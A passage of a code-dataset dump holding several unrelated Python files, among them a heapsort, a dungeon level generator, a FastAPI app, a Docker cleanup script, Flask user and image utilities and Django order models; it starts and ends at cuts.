pos.\n# K laat staan. Hier moet je een aantal dingen voor def; je moet elementen\n# naar boven kunnen laten zwemmen, maar ook elementen naar beneden kunnen laten\n# gaan.\ndef sink(rij,start,end):\n \"\"\"Laat het element op de gegeven positie zinken in de boom\"\"\"\n root = start\n while root*2+1<=end:\n child = root*2+1\n if child+1<=end and rij[child]0:\n exchange(end,0,rij)\n sink(rij,0,end-1)\n end-=1\n\ndef create_heap(rij):\n #Creer de rij\n start = (len(rij)-2)/2\n while start>=0:\n sink(rij,start,len(rij)-1)\n start-=1\n \n","sub_path":"heapsort.py","file_name":"heapsort.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"527623026","text":"__author__ = 'Anton Firsov'\n\nfrom random import randrange, choice, randint\nimport locations\n\n\nclass MyMap:\n def __init__(self, level):\n '''\n Constructor\n '''\n\n self.map_arr = [] # list of the map\n self.room_list = [] # list of existing rooms\n self.map_level = level # level the map belongs to\n\n self.__room_type_list = ['corridor', 'room'] # available types of rooms\n self.Walls = []\n self.__room_size = 0\n\n def make_map(self, w, h):\n '''\n creates the map, main methods of class\n :param w: map width, number of tiles by х\n :param h: map height, number of tiles by у\n :return:\n '''\n\n self.map_arr = [] # зачем снова, если конструктор уже так делает?\n\n self.__map_width = w\n self.__map_height = h\n\n for y in range(h): # fill the map with walls\n self.map_arr.append([])\n for x in range(w):\n self.map_arr[y].append(2)\n\n if len(self.room_list) == 0: # if there is no rooms, time to add first one\n if self.map_level == 0: # if level is 0, time to add entrance hall\n room_space = locations.entranceHall() # import location\n self.place_room(room_space, 5, 1) # place location\n else:\n room_space = self.make_room(rType='room')\n self.place_room(room_space, 0, 0)\n\n err_count = 0\n\n '''while True:\n room_w, room_h = self.make_room(rType='room')\n if self.place_room(room_w, room_h, 0, 0) == False:\n err_count = err_count + 1\n if err_count > 15:\n break'''\n\n # while len(self.room_list) < 6:\n # while self.__room_size < (self.__map_width*self.__map_height)*0.7:\n while True: # make and place rooms\n room_space = self.make_room()\n room_y, room_x, direct = self.__pick_wall()\n intrsc_x = room_x # coords of tile that connects two rooms\n intrsc_y = room_y\n if direct == 'bot': # now this thing is horrible\n room_y -= len(room_space)\n elif direct == 'top':\n room_y += 1\n elif direct == 'rig':\n room_x += 1\n elif direct == 'lef':\n room_x -= len(room_space[0])\n if self.place_room(room_space, room_x, room_y) == True:\n self.map_arr[intrsc_y][intrsc_x] = 1\n else:\n err_count = err_count + 1 # if it is impossible to place room, that is an error\n if err_count > 15: # if 15 errors were made, in can not place rooms anymore\n break\n # for i in range(len(self.room_list)):\n # self.__room_size = self.__room_size + self.room_list[i][2]*self.room_list[i][3]\n\n '''while self.__room_size < (self.__map_width*self.__map_height)*0.7:\n room_w, room_h = self.make_room(rType='room')\n self.place_room(room_w, room_h, 0, 0)\n self.__room_size = 0\n for i in range(len(self.room_list)):\n self.__room_size = self.__room_size + self.room_list[i][2]*self.room_list[i][3]'''\n\n def __pick_wall(self):\n '''\n picks a random wall attached to existing room\n :return: coords of tile, direction where new room should be placed\n '''\n while True:\n x_wall = randrange(1, self.__map_width-2)\n y_wall = randrange(1, self.__map_height-2)\n if self.map_arr[y_wall][x_wall] == 2:\n if self.map_arr[y_wall-1][x_wall] == 1:\n direct = 'top'\n break\n elif self.map_arr[y_wall+1][x_wall] == 1:\n direct = 'bot'\n break\n elif self.map_arr[y_wall][x_wall-1] == 1:\n direct = 'rig'\n break\n elif self.map_arr[y_wall][x_wall+1] == 1:\n direct = 'lef'\n break\n return y_wall, x_wall, direct\n\n def make_room(self, rType=None):\n '''\n makes new room\n :param rType: room type (None if choose randomly)\n :return: list of tile codes\n '''\n\n space = []\n\n if rType is None:\n rType = choice(self.__room_type_list)\n\n if rType == 'room':\n w = randrange(2,11)\n h = randrange(2,11)\n elif rType == 'corridor':\n if randint(0,1) == 0:\n w = 1\n h = randrange(5,11)\n else:\n w = randrange(5,11)\n h = 1\n\n for k in range(h):\n space.append([])\n for l in range(w):\n space[k].append(1)\n\n return space\n\n def __check_space(self, w, h, x_coord, y_coord):\n '''\n checks if space for the new room is free\n '''\n\n if x_coord < 1 or y_coord < 1:\n return False\n if x_coord + w > self.__map_width - 2 or y_coord + h > self.__map_height - 2:\n return False\n\n for k in range(h):\n for l in range(w):\n if self.map_arr[y_coord+k][x_coord+l] == 1:\n return False\n return True\n\n def place_room(self, space, x_coord, y_coord):\n '''\n places room on the map\n '''\n\n if x_coord == 0:\n x_coord = randrange(1,self.__map_width-2-len(space[0]))\n if y_coord == 0:\n y_coord = randrange(1,self.__map_height-2-len(space))\n\n if self.__check_space(len(space[0]), len(space), x_coord, y_coord) == True: # исправить!\n space = list(reversed(space))\n for k in range(len(space)):\n for l in range(len(space[k])):\n self.map_arr[y_coord+k][x_coord+l] = space[k][l]\n else:\n return False\n\n self.room_list.append([x_coord, y_coord, len(space[0]), len(space)])\n return True\n\n\n''' map dimensions '''\n\nstart_x = 50\nstart_y = 30\n\n''' create map '''\n\nthemap = MyMap(0) # making map of the first level\nthemap.make_map(start_x, start_y)\n\n''' prints the map '''\n\nfor y in range(len(themap.map_arr)-1, -1, -1):\n line = \"\"\n for x in range(len(themap.map_arr[y])):\n if themap.map_arr[y][x] == 0:\n line += \" \"\n if themap.map_arr[y][x] == 1:\n line += \".\"\n if themap.map_arr[y][x] == 2:\n line += \"#\"\n if themap.map_arr[y][x] == 7:\n line += \"P\"\n print(line)","sub_path":"levgen.py","file_name":"levgen.py","file_ext":"py","file_size_in_byte":6618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"439356312","text":"from fastapi import FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\nimport uvicorn\n\nfrom app.api import predict, dbpgsql\napp = FastAPI(\n title='Bridges To Prosperity - FastAPI app',\n description=\"### A data Science API utilizing FastAPI framework to deploy a machine learning model for development of a full stack web app.\"\"\",\n version='0.3',\n docs_url='/',\n)\n\n\napp.include_router(dbpgsql.router)\napp.include_router(predict.router)\n# app.include_router(viz.router)\n\n\n@app.get('/')\ndef docs():\n \"\"\"\n [Github Repo:](https://github.com/skhabiri/Bridges2Prosperity-ML-FastAPI)\n *********************************\n This Data Science API uses FastAPI framework to deploy\n a machine learning model for development of a full stack web app. The\n predictive model is a classifier. It takes seven input feature for a\n surveyed bridge project and returns a prediction with its corresponding \n probability of the project being rejected; 0; or approved; 1.\n \n The main dataset containing all the surveyed data is stored under the \n table name `cleaneddata_table` in an AWS RDS database. A subset of it, \n which is used to train the model and contains 7 selected features is stored\n under the table name `model_table`.\n \n The data science api provides four routes:\n 1. **/data_by_bridge_code**\n - It's a post method. The user enters the `project_code` and the \n `tablename`. The API connects to the corresponding table and fetches\n the queried record. Bothe request and response bodies are in JSON format.\n 2. **/all_data**\n - fetch all the data from `cleaneddata_table`. Note that depending on \n the number of the records in dastabase this might take a while.\n 3. **/prediction**\n - This route connects to machine learning model. The request body is a\n JSON format of the seven selected features with their values used in \n the model and the response body is the predicted class; 0 for negative \n and 1 for positive with the probability of the prediction.\n 4. **/**\n - root route provides documentation and url link to github repository.\n \"\"\"\n return\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=['*'],\n allow_credentials=True,\n allow_methods=['*'],\n allow_headers=['*'],\n)\n\nif __name__ == '__main__':\n uvicorn.run(app)\n","sub_path":"project/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"264786353","text":"#!/usr/bin/env python\n\n\"\"\"Author: Konrad Zemek\nCopyright (C) 2015 ACK CYFRONET AGH\nThis software is released under the MIT license cited in 'LICENSE.txt'\n\nCleans up Docker containers given by their name or id. Running containers are\nkilled first. Volumes are not removed automatically.\n\nRun the script with -h flag to learn about script's running options.\n\"\"\"\n\nimport argparse\n\nfrom environment import docker\n\n\nparser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description='Clean up dockers.')\n\nparser.add_argument(\n 'docker_ids',\n action='store',\n nargs='*',\n help='IDs of dockers to be cleaned up')\n\nargs = parser.parse_args()\n\ndocker.remove(args.docker_ids, volumes=True, force=True)\n","sub_path":"bamboos/docker/cleanup.py","file_name":"cleanup.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"142301756","text":"from tools.lumianalysis import LAnalysis as LA\nimport numpy as np\n\n\ndef exclusion_fill(dets_file_labels: list, input_dir: str, mixed_data=False, run_stddev_test=False,\n c_years=False) -> None:\n\n print('Executing exclusion mode ...\\n')\n n_files = len(dets_file_labels)\n if n_files < 3:\n raise AssertionError(\"Number of detectors must be equal or higher than 3.\")\n det_read = []\n years_and_dir = input_dir.split('/')\n year = years_and_dir[1]\n intersection = {}\n bad_runs_in_detectors = {}\n\n for k in range(0, n_files, 1):\n intersection[k] = []\n\n counts = 0\n datatype = type(1)\n\n for i in range(0, n_files - 1, 1):\n for j in range(i + 1, n_files, 1):\n input_path = 'plots/' + year + '/' + dets_file_labels[i] + '-' + dets_file_labels[j] + \\\n '/txt/Bad_runs.txt'\n try:\n det_read.append(np.loadtxt(input_path, dtype=datatype))\n except IOError as errIO:\n print('\\n Missing ' + dets_file_labels[i] + '-' + dets_file_labels[j] + ' bad runs \\n')\n det_missing = [dets_file_labels[i], dets_file_labels[j]]\n LA(det_missing, input_dir=input_dir, mixed_data=mixed_data,\n run_stddev_test=run_stddev_test, c_years=c_years, exclusion=False)\n det_read.append(np.loadtxt(input_path, dtype=datatype))\n\n intersection[i].append(counts)\n intersection[j].append(counts)\n counts = counts + 1\n\n for i in range(0, n_files, 1):\n bad_runs_in_detectors[i] = np.intersect1d(det_read[intersection[i][0]], det_read[intersection[i][1]])\n for j in range(2, len(intersection[i]), 1):\n bad_runs_in_detectors[i] = np.intersect1d(bad_runs_in_detectors[i], det_read[intersection[i][j]])\n\n filePath = 'plots/'\n txtfileName = 'Bad_runs_in_detectors'\n fileout = open(filePath + txtfileName + \".txt\", \"w+\")\n for i in range(0, n_files, 1):\n fileout.write(dets_file_labels[i] + ': ' + str(bad_runs_in_detectors[i]) + '\\n')\n fileout.close()","sub_path":"tools/exclusion_mode.py","file_name":"exclusion_mode.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"197009103","text":"from flask_login import current_user\nfrom app.models.page import PagePermission\nfrom flask import flash\nimport os\nimport fnmatch\nimport urllib.request\nimport urllib.parse\nimport urllib.error\nimport hashlib\n\nfrom flask import render_template\n\nfrom app.models.group import Group\nfrom app.utils.file import FileAPI\n\nfrom flask_babel import lazy_gettext as _\n\nALLOWED_EXTENSIONS = set(['png', 'gif', 'jpg', 'jpeg'])\nUPLOAD_DIR = 'app/static/files/users/'\n\n\nclass UserAPI:\n @staticmethod\n def has_avatar(user_id):\n \"\"\"Check if the user has uploaded an avatar.\"\"\"\n for file in os.listdir(UPLOAD_DIR):\n if fnmatch.fnmatch(file, 'avatar_' + str(user_id) + '.*'):\n return True\n return False\n\n @staticmethod\n def remove_avatar(user):\n \"\"\"Remove avatar of a user.\"\"\"\n # Find avatar by avatar_.*\n for file in os.listdir(UPLOAD_DIR):\n if fnmatch.fnmatch(file, 'avatar_' + str(user.id) + '.*'):\n path = UPLOAD_DIR + file\n os.remove(path)\n\n @staticmethod\n def avatar(user):\n \"\"\"Return the avatar of the user.\n\n If the user uploaded a avatar return it.\n If the user did not upload an avatar checks if the user has an\n gravatar, if so return that.\n If the user neither has an avatar nor an gravatar return default image.\n \"\"\"\n\n # check if user has avatar if so return it\n for file in os.listdir(UPLOAD_DIR):\n if fnmatch.fnmatch(file, 'avatar_' + str(user.id) + '.*'):\n path = '/static/files/users/' + file\n return(path)\n\n # Set default values gravatar\n email = user.email or ''\n default = 'identicon'\n size = 100\n\n # Construct the url\n gravatar_url = 'https://www.gravatar.com/avatar/' +\\\n hashlib.md5(email.lower().encode('utf-8')).hexdigest() + '?'\n gravatar_url += urllib.parse.urlencode({'d': default, 's': str(size)})\n return gravatar_url\n\n @staticmethod\n def upload(f, user_id):\n \"\"\"Upload the new avatar.\n\n Checks if the file type is allowed if so removes any\n previous uploaded avatars.\n \"\"\"\n filename = f.filename\n\n # Check if the file is allowed.\n if filename == '':\n return\n\n if '.' not in filename or not filename.rsplit('.', 1)[1].lower() \\\n in ALLOWED_EXTENSIONS:\n flash(_('Filetype not allowed'), 'danger')\n return\n\n # convert the name.\n filename = 'avatar_%d.%s' % (user_id, filename.rsplit('.', 1)[1])\n path = os.path.join(os.getcwd(), UPLOAD_DIR, filename)\n\n # Check if avatar exists if so remove.\n filename_noext, filename_ext = FileAPI.split_name(filename)\n\n for file in os.listdir(UPLOAD_DIR):\n if fnmatch.fnmatch(file, filename_noext + '.*'):\n remove_path = os.path.join(os.getcwd(), UPLOAD_DIR, file)\n os.remove(remove_path)\n\n # Save file.\n f.save(path)\n os.chmod(path, 0o644)\n return\n\n @staticmethod\n def get_groups_for_user_id(user):\n \"\"\"Return all the groups the current user belongs in.\n\n If there is no current_user (no sign in), all is returned if guests\n exists, otherwise it crashes because there can not be no all.\n\n I believe we cant put this in user because current_user can be None if\n there is no user currently logged in, but I might be mistaken. (Inja\n july 10 2013).\n \"\"\"\n if not user or not user.id:\n group = Group.query.filter(Group.name == 'all').first()\n\n if not(group):\n raise Exception(\"No group 'guests', this should never happen!\")\n return [group]\n\n return user.groups.order_by(Group.name)\n\n @staticmethod\n def get_groups_for_current_user():\n \"\"\"Call the get_groups_for_user_id function with current user.\"\"\"\n return UserAPI.get_groups_for_user_id(current_user)\n\n @staticmethod\n def can_read(page):\n if page.needs_paid and (current_user.is_anonymous or\n not current_user.has_paid):\n return False\n\n return PagePermission.get_user_rights(current_user, page.id) > 0\n\n @staticmethod\n def can_write(page):\n return PagePermission.get_user_rights(current_user, page.id) > 1\n\n @staticmethod\n def get_membership_warning():\n \"\"\"Render a warning if the current user has not paid.\"\"\"\n if current_user.is_anonymous or\\\n (current_user.is_authenticated and\n (current_user.has_paid or current_user.alumnus)):\n return ''\n\n return render_template('user/membership_warning.htm')\n","sub_path":"app/utils/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":4794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"606676688","text":"\n# https://github.com/GoogleCloudPlatform/python-docs-samples/blob/master/storage/api/list_objects.py\n# \nimport googleapiclient.discovery\nimport googleapiclient.http\n\n\nbucket = 'affymetrix-tmp-staging'\nfilename = 'examplefile'\n\ndef create_service():\n return googleapiclient.discovery.build('storage', 'v1')\n\n\ndef get_bucket_metadata(bucket):\n \"\"\"Retrieves metadata about the given bucket.\"\"\"\n service = create_service()\n\n # Make a request to buckets.get to retrieve a list of objects in the\n # specified bucket.\n req = service.buckets().get(bucket=bucket)\n return req.execute()\n\ndef list_bucket(bucket):\n \"\"\"Returns a list of metadata of the objects within the given bucket.\"\"\"\n service = create_service()\n\n # Create a request to objects.list to retrieve a list of objects.\n fields_to_return = \\\n 'nextPageToken,items(name,size,contentType,metadata(my-key))'\n req = service.objects().list(bucket=bucket, fields=fields_to_return)\n\n all_objects = []\n # If you have too many items to list in one request, list_next() will\n # automatically handle paging with the pageToken.\n while req:\n resp = req.execute()\n all_objects.extend(resp.get('items', []))\n req = service.objects().list_next(req, resp)\n return all_objects\n\n\ndef print_all():\n all = list_bucket(bucket)\n for x in all:\n print(str(x))\n\n\n#print_all()\n\nr = get_bucket_metadata(bucket)\nprint(str(r))\n","sub_path":"google_cloud/storage/bucket_storage_api.py","file_name":"bucket_storage_api.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"510431945","text":"class User():\n\n def __init__(self, first, last):\n self.first = first\n self.last = last\n self.login_attempts = 0\n\n def greet_user(self):\n print(\"Hi \"+self.first.title()+\" \" +\n self.last.title()+\" welcome to the party!\")\n\n def count_login_attempts(self):\n self.login_attempts += 1\n login_counts = self.login_attempts\n print(\"Login attempts \"+str(login_counts))\n\n def reset_login_attempts_count(self):\n self.login_attempts = 0\n print(\"Login attempts reset to \"+str(self.login_attempts))\n\n\nclass Admin(User):\n def __init__(self, first, last):\n super().__init__(first, last)\n self.privileges = ['can add post',\n 'can delete post',\n 'can ban user']\n\n def show_privileges(self):\n print(\"Admin privilages\")\n for privilage in self.privileges:\n print(\"- \"+privilage)\n\n def get_privileges(self):\n current_privilege = []\n for privilage in self.privileges:\n current_privilege.append(privilage)\n return current_privilege\n\n\nuser1 = Admin('ebo', 'riley')\nuser1.show_privileges()\nprint(user1.get_privileges())\nfor privilage in user1.get_privileges():\n print(\"- \"+privilage)\n","sub_path":"admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"259143065","text":"from django.db import models\nfrom core.models import Company, Site, EmployeeManager\nfrom opticon.globalstrings import Globalstrings\nimport core.models\n\ndef print_str(self):\n\tif self.order_from:\n\t\treturn \"%s - %s is orderer from %s\" % (str(self.site), str(self.order_from.company), str(self.company));\n\telse:\n\t\treturn str(self.site)\n\t\t\n# Auftrag\nclass Order(models.Model):\n\tordernumber_required = models.BooleanField(default=False)\n\tordernumber = models.CharField(max_length=200)\n\n\tsite = models.ForeignKey(Site)\n\torder_from = models.ForeignKey('Order', null=True, blank=True)\n\tcompany = models.ForeignKey(Company, related_name='order', null=False, blank=True)\n\t#subcompany = models.ManyToManyField(Company, related_name='subcompany', null=True, blank=True)\n\n\tAPPROVED = 'Y'\n\tAPPROVING = 'C'\n\tDENIED = 'D'\n\tgs = Globalstrings()\n\tORDERNUMBER_APPROVED_CHOICES = (\n\t\t(APPROVED, gs.yes),\n\t\t(APPROVING, gs.approving),\n\t\t(DENIED, gs.no),\n\t)\n\tordernumber_approved = models.CharField(\n\t\tmax_length=1,\n\t\tchoices=ORDERNUMBER_APPROVED_CHOICES, \n\t\tdefault='', \n\t\tnull=False, \n\t\tblank=True\n\t)\n\n\tdef __str__(self):\n\t\tif self.ordernumber:\n\t\t\treturn self.ordernumber\n\t\telse:\n\t\t\treturn print_str(self)\n\t\t\n\tdef get_site_orderer(self):\n\t\tif self.order_from:\n\t\t\treturn str(self.site) + ' - ' + str(self.order_from.company)\n\t\telse:\n\t\t\treturn str(self.site)\n\n\tdef delete_ordernumber(self):\n\t\tself.ordernumber = ''\n\t\tself.ordernumber_approved = ''\n\t\tself.save()\n\t\treturn self\n\t\t\nclass OrderManager(models.Manager):\n\t\n\tdef get_orders_of_company(employer): # @NoSelf\n\t\treturn Order.objects.filter(company=employer)\n\t\n\tdef get_orders_of_employee(employee): # @NoSelf\n\t\torders = Order.objects.filter(id__in = core.models.IdentityCard.objects.filter(employee=employee).values('order_id'))\n\t\treturn orders\n\n\tdef get_employees_of_order(order, present=None, faulty=None):\n\t\t# Get all Identity Cards for this order\n\t\tids = core.models.IdentityCard.objects.filter(order_id = order)\n\n\t\t# Filter for present ID Cards\n\t\tif present:\n\t\t\tids = ids.filter(present=True)\n\n\t\t# Get all Employees of ID Cards\n\t\temployees = core.models.Employee.objects.filter(employee__in=ids)\n\t\t\n\t\t# Initialise Employees \n\t\t# Assign the ID Cards to the Employee Objects\n\t\tinit_employees = []\n\t\tfor employee in employees:\n\t\t\tidcardManager = core.models.IDCardManager()\n\t\t\temployee.idcards = idcardManager.get_idcards(employee=employee, order_id=order)\n\t\t\tif len(employee.idcards) == 1:\n\t\t\t\temployee.idcard = employee.idcards[0]\n\t\t\temployee.init()\n\n\t\t\tif faulty:\n\t\t\t\tif employee.is_faulty:\n\t\t\t\t\tinit_employees.append(employee)\n\t\t\telse:\n\t\t\t\tinit_employees.append(employee)\n\n\t\treturn init_employees\n\n\tdef get_count_employees_of_order(order):\n\t\temployees_list = []\n\t\tfaulty_employees_list = []\n\t\tpresent_employees_list = []\n\n\t\t# Get all Identity Cards for this order\n\t\tids = core.models.IdentityCard.objects.filter(order_id = order)\n\n\t\t# Get all Employees of ID Cards\n\t\temployees = core.models.Employee.objects.filter(employee__in=ids)\n\t\t\n\t\t# Assign the ID Cards to the Employee Objects\n\t\tfor employee in employees:\n\t\t\tidcardManager = core.models.IDCardManager()\n\t\t\temployee.idcards = idcardManager.get_idcards(employee=employee, order_id=order)\n\t\t\temployee.init()\n\n\t\t\t# Filter for faulty ID Cards\n\t\t\tif employee.is_faulty:\n\t\t\t\tfaulty_employees_list.append(employee)\n\t\t\t# Filter for present ID Cards\n\t\t\tif employee.idcards[0].present:\n\t\t\t\tpresent_employees_list.append(employee)\n\t\t\temployees_list.append(employee)\n\n\t\tcounts = {\n\t\t\t'count_all_employees': len(employees_list),\n\t\t\t'count_faulty_employees': len(faulty_employees_list),\n\t\t\t'count_present_employees': len(present_employees_list),\n\t\t}\n\t\treturn counts\n\n\tdef get_siteowner_orders(site):\n\t\t# order_from__isnull=True means, that this order is the \"order\" we created for the siteowners/Bauherren\n\t\tsiteowner_orders = Order.objects.filter(order_from__isnull=True).filter(site = site)\n\t\treturn siteowner_orders\n\n\tdef get_suborders(order):\n\t\torders = Order.objects.filter(order_from=order).filter(site = order.site)\n\t\treturn orders\n\t\n\tdef make_order_from_invitation(request, invitation): # @NoSelf\n\t\temployer = EmployeeManager.get_employer(request)\n\t\torder = Order()\n\t\torder.site = invitation.site\n\t\torder.order_from = invitation.order_from\n\t\torder.company = employer\n\t\torder.save()\n\t\t#order.order_from.subcompany.add(employer)\n\t\t#order.order_from.save()\n\t\t#invitation.delete()\n\t\treturn order\n\t\n\tdef make_order_from_new_invitation(employer, invitation): # @NoSelf\n\t\torder = Order()\n\t\torder.site = invitation.site\n\t\torder.order_from = invitation.order_from\n\t\torder.company = employer\n\t\torder.save()\n\t\t#order.order_from.subcompany.add(employer)\n\t\t#order.order_from.save()\n\t\t#invitation.delete()\n\t\treturn order\n","sub_path":"opticon/core/models/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":4696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"642701539","text":"class Temperatura(object):\n def __init__(self):\n pass\n\n def mediaTemperatura(self, janeiro=None, fevereiro=None, marco=None, abril=None, maio=None, junho=None, julho=None, agosto=None, setembro=None, outubro=None, novembro=None, dezembro=None):\n if janeiro != None and fevereiro != None and marco != None and abril != None and maio != None and junho != None and julho != None and agosto != None and setembro != None and outubro != None and novembro != None and dezembro != None:\n mediaTemperatura = (janeiro + fevereiro + marco + abril + maio + junho + julho + agosto + setembro + outubro + novembro + dezembro) / 12\n listaTemperatura = (janeiro, fevereiro, marco, abril, maio, junho, julho, agosto, setembro, outubro, novembro, dezembro)\n\n elif janeiro != None and fevereiro != None and marco != None and abril != None and maio != None and junho != None and julho != None and agosto != None and setembro != None and outubro != None and novembro != None:\n mediaTemperatura = (janeiro + fevereiro + marco + abril + maio + junho + julho + agosto + setembro + outubro + novembro) / 11\n listaTemperatura = (janeiro, fevereiro, marco, abril, maio, junho, julho, agosto, setembro, outubro, novembro)\n\n elif janeiro != None and fevereiro != None and marco != None and abril != None and maio != None and junho != None and julho != None and agosto != None and setembro != None and outubro != None:\n mediaTemperatura = (janeiro + fevereiro + marco + abril + maio + junho + julho + agosto + setembro + outubro) / 10\n listaTemperatura = (janeiro, fevereiro, marco, abril, maio, junho, julho, agosto, setembro, outubro)\n\n elif janeiro != None and fevereiro != None and marco != None and abril != None and maio != None and junho != None and julho != None and agosto != None and setembro != None:\n mediaTemperatura = (janeiro + fevereiro + marco + abril + maio + junho + julho + agosto + setembro) / 9\n listaTemperatura = (janeiro, fevereiro, marco, abril, maio, junho, julho, agosto, setembro)\n\n elif janeiro != None and fevereiro != None and marco != None and abril != None and maio != None and junho != None and julho != None and agosto != None:\n mediaTemperatura = (janeiro + fevereiro + marco + abril + maio + junho + julho + agosto) / 8\n listaTemperatura = (janeiro, fevereiro, marco, abril, maio, junho, julho, agosto)\n\n elif janeiro != None and fevereiro != None and marco != None and abril != None and maio != None and junho != None and julho != None:\n mediaTemperatura = (janeiro + fevereiro + marco + abril + maio + junho + julho) / 7\n listaTemperatura = (janeiro, fevereiro, marco, abril, maio, junho, julho)\n\n elif janeiro != None and fevereiro != None and marco != None and abril != None and maio != None and junho != None:\n mediaTemperatura = (janeiro + fevereiro + marco + abril + maio + junho) / 6\n listaTemperatura = (janeiro, fevereiro, marco, abril, maio, junho)\n\n elif janeiro != None and fevereiro != None and marco != None and abril != None and maio != None:\n mediaTemperatura = (janeiro + fevereiro + marco + abril + maio) / 5\n listaTemperatura = (janeiro, fevereiro, marco, abril, maio)\n\n elif janeiro != None and fevereiro != None and marco != None and abril != None:\n mediaTemperatura = (janeiro + fevereiro + marco + abril) / 4\n listaTemperatura = (janeiro, fevereiro, marco, abril)\n\n elif janeiro != None and fevereiro != None and marco != None:\n mediaTemperatura = (janeiro + fevereiro + marco) / 3\n listaTemperatura = (janeiro, fevereiro, marco)\n\n elif janeiro != None and fevereiro != None:\n mediaTemperatura = (janeiro + fevereiro) / 2\n listaTemperatura = (janeiro, fevereiro)\n\n else:\n mediaTemperatura = janeiro\n listaTemperatura = (janeiro)\n\n return mediaTemperatura, listaTemperatura\n\n\n def perdasTemperatura(self, temperaturaMedia, tipoDeEstrutura, temperaturaReferencia, coefPmax):\n count = 0\n i = 0\n lista = []\n while count < len(temperaturaMedia):\n lista.append(temperaturaMedia[i] + (tipoDeEstrutura - temperaturaReferencia))\n i += 1\n count += 1\n j = 0\n cont = 0\n lista2 = []\n while cont < len(temperaturaMedia):\n lista2.append(100 + (lista[j]) * coefPmax)\n j += 1\n cont += 1\n\n return lista2\n\n\n\n def fatorDesempenhoGlobal(self, listaTempMensal, perdasTotais):\n k = 0\n contador = 0\n lista3 = []\n while contador < len(listaTempMensal):\n lista3.append((listaTempMensal[k] * perdasTotais) / 10000)\n k += 1\n contador += 1\n return lista3\n\n\n","sub_path":"Temperatura.py","file_name":"Temperatura.py","file_ext":"py","file_size_in_byte":4931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"549298680","text":"\n\"\"\" Module summary:\nUtility functions for checking login, accessing user data, and managing \nuser images:\n login_required - Verify that a user is logged in when required.\n createUser - Create a new user and add them to the database.\n getUserInfo - Retrieve user object by their id.\n getUserID - Retrieve user object by their email address.\n allowedFile - Determine if the file has an allowed extension.\n imageUploadProfile - Upload a profile image.\n imageDeleteProfile - Delete a profile image.\n imageUploadItem - Upload a catalog item image.\n imageDeleteItem - Delete a catalog item image.\n\"\"\"\n\nimport os\nfrom functools import wraps\nfrom werkzeug.utils import secure_filename\n\nfrom flask import session as login_session\nfrom flask import Blueprint, current_app, url_for, flash, redirect\n\nfrom itemcatalog.database.dbsetup import User\nfrom itemcatalog.database.dbconnect import db_session\n\n############################################################################\n\nutil = Blueprint(\"util\", __name__)\n\n# Helper functions for user login processes:\ndef login_required(f):\n \"\"\"Verify that a user is logged in when required.\"\"\"\n @wraps(f)\n def decorated_function(*args, **kwargs):\n if \"user_id\" in login_session:\n return f(*args, **kwargs)\n else:\n flash(\"You are not allowed to access that page.\")\n return redirect('/login')\n return decorated_function\n\n\ndef createUser(login_session):\n \"\"\"Create a new user and add them to the database.\"\"\"\n newUser = User(name=login_session[\"g_username\"],\n email=login_session[\"email\"])\n db_session.add(newUser)\n db_session.commit()\n user = db_session.query(User).filter_by(email=login_session[\"email\"]).one()\n return user.id\n\n\ndef getUserInfo(user_id):\n \"\"\"Retrieve user object by their id.\"\"\"\n user = db_session.query(User).filter_by(id=user_id).one()\n return user\n\n\ndef getUserID(email):\n \"\"\"Retrieve user object by their email address.\"\"\"\n try:\n user = db_session.query(User).filter_by(email=email).one()\n return user.id\n except:\n return None\n\n\n\n############################################################################\n\n\n# Helper functions for managing images:\ndef allowedFile(filename):\n \"\"\"Determine if the file has an allowed extension.\"\"\"\n app = current_app\n \n return \".\" in filename and \\\n filename.rsplit(\".\",1)[1].lower() in app.config['ALLOWED_EXTENSIONS']\n\n\ndef imageUploadProfile(farm_id, file):\n \"\"\"Upload a profile image.\"\"\"\n app = current_app\n if file and allowedFile(file.filename):\n filename = str(farm_id) + \"_\" + file.filename\n filename = secure_filename(filename)\n filedir = os.path.join(app.config['UPLOAD_FOLDER_PROFILE'], filename)\n\n file.save(filedir)\n return filename\n\n else:\n return None\n\n\ndef imageDeleteProfile(filename):\n \"\"\"Delete a profile image.\"\"\"\n app = current_app\n os.remove(os.path.join(app.config['UPLOAD_FOLDER_PROFILE'], filename))\n\n\ndef imageUploadItem(farm_id, item_id, file):\n \"\"\"Upload a catalog item image.\"\"\"\n app = current_app\n if file and allowedFile(file.filename):\n filename = \"_\".join([str(farm_id),str(item_id),file.filename])\n filename = secure_filename(filename)\n filedir = os.path.join(app.config['UPLOAD_FOLDER_ITEM'], filename)\n\n file.save(filedir)\n return filename\n\n else:\n return None\n\n\ndef imageDeleteItem(filename):\n \"\"\"Delete a catalog item image.\"\"\"\n app = current_app\n os.remove(os.path.join(app.config['UPLOAD_FOLDER_ITEM'], filename))\n","sub_path":"itemcatalog/views/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"167813519","text":"import os\n# RUNNABLE OBJECTS that we use in pool map by calling run instance on \nfrom Helpers import 